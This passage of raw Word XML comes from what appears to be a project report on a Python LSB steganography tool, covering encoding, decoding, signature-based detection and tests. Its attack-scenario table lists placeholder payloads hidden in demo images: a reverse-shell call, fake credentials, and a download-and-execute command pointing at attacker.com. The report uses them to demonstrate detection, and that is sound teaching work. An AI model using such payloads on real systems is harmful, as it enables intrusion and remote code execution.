            <w:tcW w:type="dxa" w:w="7344"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Houses encode_image(), decode_image(), and detect_steganography(). Pure logic, no I/O.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7344"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Interactive CLI loop: lists images, prompts for choices, calls steganography functions, displays results.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>setup_images.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7344"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Programmatically generates 2 clean and 3 malicious test images (malware payload, stolen credentials, C2 command).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>test_steganography.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7344"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Unit tests: creates a synthetic image, encodes a known message, decodes it, asserts equality, verifies detection on both encoded and clean images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5. IMPLEMENTATION DETAILS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.1  Encoding Algorithm  (encode_image)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The encoding workflow proceeds in four steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open the image with Pillow and convert to RGB mode if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Append the delimiter ###END### to the message and convert every character to its 8-bit binary representation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Validate that the binary payload fits within the available pixel channels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Iterate over every pixel; for each of the three channels (R, G, B), replace its LSB with the next message bit using a bitwise AND/OR mask:  pixel[i] = (pixel[i] &amp; ~1) | bit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Core LSB replacement (steganography.py, line 33)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pixel[i] = (pixel[i] &amp; ~1) | int(binary_data[bit_idx])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># ~1 clears the LSB; OR sets it to the desired message bit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The result is saved as PNG, which uses lossless compression and preserves every pixel value exactly. JPEG is deliberately avoided for output because its lossy compression would destroy the embedded bits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.2  Decoding Algorithm  (decode_image)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Decoding is the exact inverse: all pixels are read, the LSB of each channel is extracted and concatenated into a bit-string, then groups of 8 bits are converted to characters. Decoding stops as soon as the ###END### delimiter is found, and the delimiter is stripped before returning the plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.3  Detection / Steganalysis  (detect_steganography)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The detect_steganography() function is a signature-based heuristic: it invokes decode_image() and checks whether a valid (non-None) result is returned. If the delimiter is found in the LSBs, the image is flagged as containing hidden data and the extracted message is reported.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This approach works reliably for images encoded by this tool. Real-world steganalysis is far more complex and involves statistical analysis (chi-square tests, RS analysis) rather than simple signature matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4  Test Suite  (test_steganography.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The automated tests cover three assertions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Round-trip fidelity — a known message encoded into a 50×50 red image can be decoded back to the identical string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Detection positive — detect_steganography() returns True and the correct message for an encoded image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Detection negative — detect_steganography() returns False for a plain (never-encoded) image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6. ATTACK SCENARIOS DEMONSTRATED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The setup_images.py script pre-loads three malicious images to illustrate how steganography is abused in real attacks:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Image File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Attack Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5328"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Embedded Payload</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DE9E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>malicious_1.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Malware Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5328"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MALWARE_PAYLOAD: execute_reverse_shell(ip='192.168.1.100')</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DE9E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>malicious_2.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Credential Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5328"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>STOLEN_DATA: user='admin', pass='P@ssw0rd123'</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DE9E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>malicious_3.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>C2 Command Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5328"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>C2_COMMAND: download_and_exec('http://attacker.com/backdoor.exe')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These scenarios mirror documented threat-actor techniques (e.g., APT groups hiding C2 strings in benign-looking social-media images) and reinforce the importance of the detection feature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7. TOOLS &amp; TECHNOLOGIES</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>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Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Core programming language</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Pillow (PIL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Image opening, pixel manipulation, and saving via Image and ImageDraw classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>binascii</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>stdlib</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hexadecimal ↔ binary conversions used in text_to_bin() helper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>8. RESULTS &amp; TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8.1  Encoding Visual Fidelity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>After encoding, the stego-image appears visually identical to the original. Because only the LSB of each channel is modified, the maximum per-channel colour deviation is ±1 out of 255 — a change of 0.4% that is well below the human visual threshold. The output is always saved as PNG (lossless) to preserve every modified bit.</w:t>
      </w:r>
    </w:p>
    <w:p>
